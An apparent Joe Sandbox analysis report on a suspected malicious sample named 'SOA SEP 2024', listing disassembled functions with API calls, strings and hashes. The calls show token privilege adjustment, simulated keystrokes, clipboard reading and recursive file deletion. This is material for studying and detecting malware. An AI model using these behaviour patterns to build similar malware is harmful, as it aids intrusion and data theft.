Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 37cc8f4f13adfadc707c7eae24be1668184a8992fe9f1d5aa99cac1df521e3cd
Instruction ID: 7c2a62014d56e38c3251f39e84e8953355546766222ab0127d44642f996da342
Opcode Fuzzy Hash: 37cc8f4f13adfadc707c7eae24be1668184a8992fe9f1d5aa99cac1df521e3cd
Instruction Fuzzy Hash: 07F039B1505702DFCB349F64D8A4816BBE4BF043253348A3EF9D786610C73A9844DF50

Function 007640A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007640C6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 5ca95d2f6a00143242c18fe95774397a6e0910525dbfc74639f876fff0395351
Instruction ID: dfd14363e209f1b1dd0c1d7390b14f659660a24a826f6fccc99b252e2cda7ad1
Opcode Fuzzy Hash: 5ca95d2f6a00143242c18fe95774397a6e0910525dbfc74639f876fff0395351
Instruction Fuzzy Hash: 20E0CD365001245BC711A654CC46FEA779DDF8C690F054075F905E7244D9789D818690

Function 007ABCF4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 007ABD16

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction ID: 595ec8954e6166986abd188cc19cf7e46d06ad2386f6d5ff41ee12a6c376955a
Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
Instruction Fuzzy Hash: C2E0D8B0204B409FD7348B24D800BE373E0EB46305F00091DF29BC3242EB637841C759

Function 00D68260 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00D68271

Memory Dump Source

Source File: 00000000.00000002.2102902206.0000000000D66000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D66000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d66000_SOA SEP 2024.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: d6ce1789da9f871f828e7ea4c4aeee2c0b0f81d460ac8e11defed1449855cffb
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: D4E0BF7494010D9FDB40EFA8D54969E7BB4EF04701F100261FD0192280DA3099509A62

Non-executed Functions

Function 007CF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0077B34E: GetWindowLongW.USER32(?,000000EB), ref: 0077B35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 007CF87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CF8DC
GetWindowLongW.USER32(?,000000F0), ref: 007CF919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CF940
SendMessageW.USER32 ref: 007CF966
_wcsncpy.LIBCMT ref: 007CF9D2
GetKeyState.USER32(00000011), ref: 007CF9F3
GetKeyState.USER32(00000009), ref: 007CFA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007CFA16
GetKeyState.USER32(00000010), ref: 007CFA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007CFA4F
SendMessageW.USER32 ref: 007CFA72
SendMessageW.USER32(?,00001030,?,007CE059), ref: 007CFB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 007CFB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 007CFB96
SetCapture.USER32(?), ref: 007CFB9F
ClientToScreen.USER32(?,?), ref: 007CFC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 007CFC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 007CFC29
ReleaseCapture.USER32 ref: 007CFC34
GetCursorPos.USER32(?), ref: 007CFC69
ScreenToClient.USER32(?,?), ref: 007CFC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFCD8
SendMessageW.USER32 ref: 007CFD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFD41
SendMessageW.USER32 ref: 007CFD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007CFD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 007CFD8F
GetCursorPos.USER32(?), ref: 007CFDB0
ScreenToClient.USER32(?,?), ref: 007CFDBD
GetParent.USER32(?), ref: 007CFDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 007CFE3F
SendMessageW.USER32 ref: 007CFE6F
ClientToScreen.USER32(?,?), ref: 007CFEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007CFEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 007CFF19
SendMessageW.USER32 ref: 007CFF3C
ClientToScreen.USER32(?,?), ref: 007CFF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007CFFB6
GetWindowLongW.USER32(?,000000F0), ref: 007D004B

Strings

F, xrefs: 007CFF42
@GUI_DRAGID, xrefs: 007CFBCC

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 2516578528-4164748364
Opcode ID: dc6373a376c96750b1d465338dc18fa5c90c5f578603dc840d0999e964f9bdb8
Instruction ID: b4b0a720864f54dc48284c398ba237d83e27d52ad1590e5b817db0673bfc7ad4
Opcode Fuzzy Hash: dc6373a376c96750b1d465338dc18fa5c90c5f578603dc840d0999e964f9bdb8
Instruction Fuzzy Hash: 18329870604244EFDB20CF64C888FAABBEAFB49354F14462EFA95872A1C739DC55CB51

Function 007CAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007CB1CD

Strings

%d/%02d/%02d, xrefs: 007CAEFC

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: e43be3aedc992db93405d9635998e69762307f33022465bc5824d27934651dce
Instruction ID: 236b23a24d0a9e99f9eb23a4127744e6e28c500c72d5abc16ead6755afd59904
Opcode Fuzzy Hash: e43be3aedc992db93405d9635998e69762307f33022465bc5824d27934651dce
Instruction Fuzzy Hash: 3E12BF71600248ABEB258F64CC4AFAA7BB8FF49714F14811DF91ADA2D1DB788941CB61

Function 0077EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000), ref: 0077EB4A
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D3AEA
IsIconic.USER32(000000FF), ref: 007D3AF3
ShowWindow.USER32(000000FF,00000009), ref: 007D3B00
SetForegroundWindow.USER32(000000FF), ref: 007D3B0A
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007D3B20
GetCurrentThreadId.KERNEL32 ref: 007D3B27
GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007D3B33
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D3B44
AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007D3B4C
AttachThreadInput.USER32(00000000,?,00000001), ref: 007D3B54
SetForegroundWindow.USER32(000000FF), ref: 007D3B57
MapVirtualKeyW.USER32(00000012,00000000), ref: 007D3B6C
keybd_event.USER32(00000012,00000000), ref: 007D3B77
MapVirtualKeyW.USER32(00000012,00000000), ref: 007D3B81
keybd_event.USER32(00000012,00000000), ref: 007D3B86
MapVirtualKeyW.USER32(00000012,00000000), ref: 007D3B8F
keybd_event.USER32(00000012,00000000), ref: 007D3B94
MapVirtualKeyW.USER32(00000012,00000000), ref: 007D3B9E
keybd_event.USER32(00000012,00000000), ref: 007D3BA3
SetForegroundWindow.USER32(000000FF), ref: 007D3BA6
AttachThreadInput.USER32(000000FF,?,00000000), ref: 007D3BCD

Strings

Shell_TrayWnd, xrefs: 007D3AE5

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 884962779a7e5d2a520beb3069f9d09e5ea6edbb47395981e9746d4d412c7a10
Instruction ID: 15e954193917d4ed596bc0d37edd0e84aca391d0dc82af32831fda293cebb82b
Opcode Fuzzy Hash: 884962779a7e5d2a520beb3069f9d09e5ea6edbb47395981e9746d4d412c7a10
Instruction Fuzzy Hash: 523196B1A403587FEB305B658C89F7F7E7CEB48B50F108016FA05EE2D0D6B95D109AA5

Function 0079ACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON

Download Yara Rule

APIs

Part of subcall function 0079B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079B180
Part of subcall function 0079B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0079B1AD
Part of subcall function 0079B134: GetLastError.KERNEL32 ref: 0079B1BA

_memset.LIBCMT ref: 0079AD08
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0079AD5A
CloseHandle.KERNEL32(?), ref: 0079AD6B
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0079AD82
GetProcessWindowStation.USER32 ref: 0079AD9B
SetProcessWindowStation.USER32(00000000), ref: 0079ADA5
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0079ADBF

Part of subcall function 0079AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0079ACC0), ref: 0079AB99
Part of subcall function 0079AB84: CloseHandle.KERNEL32(?,?,0079ACC0), ref: 0079ABAB

Strings

default, xrefs: 0079ADBA
, xrefs: 0079AD17
winsta0, xrefs: 0079AD7D

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: cfac3bc8ff719d2761ed9c051a914e82f45795fe5b13da0d771c6483bccd740f
Instruction ID: 947b7eafa99f5b109b1a2b0f7407f33eef0b6d9853536aab0516010496cffb7f
Opcode Fuzzy Hash: cfac3bc8ff719d2761ed9c051a914e82f45795fe5b13da0d771c6483bccd740f
Instruction Fuzzy Hash: 26818CB1902249FFDF119FA4EC8AAEE7B79FF08304F048119F814A6161D7398E54DBA1

Function 007A60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007A6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A5FA6,?), ref: 007A6ED8

Part of subcall function 007A6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A5FA6,?), ref: 007A6EF1

Part of subcall function 007A725E: __wsplitpath.LIBCMT ref: 007A727B
Part of subcall function 007A725E: __wsplitpath.LIBCMT ref: 007A728E

Part of subcall function 007A72CB: GetFileAttributesW.KERNEL32(?,007A6019), ref: 007A72CC

_wcscat.LIBCMT ref: 007A6149
_wcscat.LIBCMT ref: 007A6167
__wsplitpath.LIBCMT ref: 007A618E
FindFirstFileW.KERNEL32(?,?), ref: 007A61A4
_wcscpy.LIBCMT ref: 007A6209
_wcscat.LIBCMT ref: 007A621C
_wcscat.LIBCMT ref: 007A622F
lstrcmpiW.KERNEL32(?,?), ref: 007A625D
DeleteFileW.KERNEL32(?), ref: 007A626E
MoveFileW.KERNEL32(?,?), ref: 007A6289
MoveFileW.KERNEL32(?,?), ref: 007A6298
CopyFileW.KERNEL32(?,?,00000000), ref: 007A62AD
DeleteFileW.KERNEL32(?), ref: 007A62BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 007A62E1
FindClose.KERNEL32(00000000), ref: 007A62FD
FindClose.KERNEL32(00000000), ref: 007A630B

Strings

\*.*, xrefs: 007A6138, 007A6147, 007A6165

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*
API String ID: 1917200108-1173974218
Opcode ID: 386f87c752870e3655d59cff534555fb73a0730b483afb62488835effe6351b3
Instruction ID: 8fe69d8a8b2cd1d325ad53243e747b4950408490a755b9452787ed45da98c531
Opcode Fuzzy Hash: 386f87c752870e3655d59cff534555fb73a0730b483afb62488835effe6351b3
Instruction Fuzzy Hash: FF51217280915CAACB21EB91CC48EEF77BCBF45300F0941E6E645E3141DE7A9B498FA4

Function 007B6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(007FDC00), ref: 007B6B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 007B6B44
GetClipboardData.USER32(0000000D), ref: 007B6B4C
CloseClipboard.USER32 ref: 007B6B58
GlobalLock.KERNEL32(00000000), ref: 007B6B74
CloseClipboard.USER32 ref: 007B6B7E
GlobalUnlock.KERNEL32(00000000), ref: 007B6B93
IsClipboardFormatAvailable.USER32(00000001), ref: 007B6BA0
GetClipboardData.USER32(00000001), ref: 007B6BA8
GlobalLock.KERNEL32(00000000), ref: 007B6BB5
GlobalUnlock.KERNEL32(00000000), ref: 007B6BE9
CloseClipboard.USER32 ref: 007B6CF6

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 3f3089e739394945b271bba6eb137be8a3a1a22585dda1c8ba8b86a372324be6
Instruction ID: 3b1cd2c93927cbb1c3d9a47241efcdadc327c31d337627a750bb30d9b5a51951
Opcode Fuzzy Hash: 3f3089e739394945b271bba6eb137be8a3a1a22585dda1c8ba8b86a372324be6
Instruction Fuzzy Hash: 9551B471200241ABD311AF64CD9AFBF77B8AF58B00F104529FA86DA1D1DF7CEC058A66

Function 007AF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AF62B
FindClose.KERNEL32(00000000), ref: 007AF67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AF6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007AF6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 007AF6E2
__swprintf.LIBCMT ref: 007AF72E
__swprintf.LIBCMT ref: 007AF767
__swprintf.LIBCMT ref: 007AF7BB

Part of subcall function 0078172B: __woutput_l.LIBCMT ref: 00781784

__swprintf.LIBCMT ref: 007AF809
__swprintf.LIBCMT ref: 007AF858
__swprintf.LIBCMT ref: 007AF8A7
__swprintf.LIBCMT ref: 007AF8F6

Strings

%4d, xrefs: 007AF761
%02d, xrefs: 007AF7B0, 007AF7B9, 007AF807, 007AF856, 007AF8A5, 007AF8F4
%4d%02d%02d%02d%02d%02d, xrefs: 007AF728

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: 30c66bb5209b76167f995dfd352e4d000e376b28e3d397f844176671c1dc9a89
Instruction ID: 21d6a534d902239822cf160f555a2e82b4572786f4a68424a52e5d8c7d0521cb
Opcode Fuzzy Hash: 30c66bb5209b76167f995dfd352e4d000e376b28e3d397f844176671c1dc9a89
Instruction Fuzzy Hash: 12A10FB1504344EBC711EB94C889DAFB7ECEF98700F44492DF696C6152EB38D949CB62

Function 007B1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B1B50
_wcscmp.LIBCMT ref: 007B1B65
_wcscmp.LIBCMT ref: 007B1B7C
GetFileAttributesW.KERNEL32(?), ref: 007B1B8E
SetFileAttributesW.KERNEL32(?,?), ref: 007B1BA8
FindNextFileW.KERNEL32(00000000,?), ref: 007B1BC0
FindClose.KERNEL32(00000000), ref: 007B1BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 007B1BE7
_wcscmp.LIBCMT ref: 007B1C0E
_wcscmp.LIBCMT ref: 007B1C25
SetCurrentDirectoryW.KERNEL32(?), ref: 007B1C37
SetCurrentDirectoryW.KERNEL32(008139FC), ref: 007B1C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 007B1C5F
FindClose.KERNEL32(00000000), ref: 007B1C6C
FindClose.KERNEL32(00000000), ref: 007B1C7C

Strings

*.*, xrefs: 007B1BE2

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 7ec937c03e19d6e7cef029d01e2f97a789151d52190f7606a63621dbc2a36540
Instruction ID: 426851fdaaef57b85adfc878bce825d9d71843932b7ef0f5c7706e838b59c6a0
Opcode Fuzzy Hash: 7ec937c03e19d6e7cef029d01e2f97a789151d52190f7606a63621dbc2a36540
Instruction Fuzzy Hash: DB31D671541259AFCF20ABA0DC59BEE7BACAF09310F904155E911D3190EB78DE858B64

Function 007B1C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 007B1CAB
_wcscmp.LIBCMT ref: 007B1CC0
_wcscmp.LIBCMT ref: 007B1CD7

Part of subcall function 007A6BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007A6BEF

FindNextFileW.KERNEL32(00000000,?), ref: 007B1D06
FindClose.KERNEL32(00000000), ref: 007B1D11
FindFirstFileW.KERNEL32(*.*,?), ref: 007B1D2D
_wcscmp.LIBCMT ref: 007B1D54
_wcscmp.LIBCMT ref: 007B1D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 007B1D7D
SetCurrentDirectoryW.KERNEL32(008139FC), ref: 007B1D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 007B1DA5
FindClose.KERNEL32(00000000), ref: 007B1DB2
FindClose.KERNEL32(00000000), ref: 007B1DC2

Strings

*.*, xrefs: 007B1D28

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: b2c9058d3aeb6d0c2c30f60413903d4e7eb8450406075a9c934782f494085aee
Instruction ID: f4abf1ca862df5a80c3628381fb4dd8845e5e37adcdf4863ffd8744042e941ab
Opcode Fuzzy Hash: b2c9058d3aeb6d0c2c30f60413903d4e7eb8450406075a9c934782f494085aee
Instruction Fuzzy Hash: 5B31163160121DAACF20EBA0DC59BDE3BADAF05320F904551F910E6190DB3CCE95CB64

Function 00767D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00767DBD

Strings

\, xrefs: 007DF95B
], xrefs: 00767D9F
Q\E, xrefs: 007686D6
^, xrefs: 00767D96
\, xrefs: 00767E1D
\, xrefs: 00767D89
[:>:]], xrefs: 00767D37
\b(?=\w), xrefs: 007DF85E
[:<:]], xrefs: 00767D1D
[, xrefs: 00767E14
\b(?<=\w), xrefs: 007DF877

Memory Dump Source

Source File: 00000000.00000002.2102053386.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.2102039912.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102106470.000000000080E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102149202.000000000081A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2102166761.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_SOA SEP 2024.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: a85664a7d20f966e70326f42b2066973da293c3e9cf82282c4024bea842fa6a8
Instruction ID: 71e75a4e0272140bd207614982bf56abdf08a525fb2719d6609ad5f36a3540cd
Opcode Fuzzy Hash: a85664a7d20f966e70326f42b2066973da293c3e9cf82282c4024bea842fa6a8
Instruction Fuzzy Hash: E182A271D04219DBCF28CF98C8807ADB7B1FF48354F25816AD85AAB351E7789D85CB90

Function 007B091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

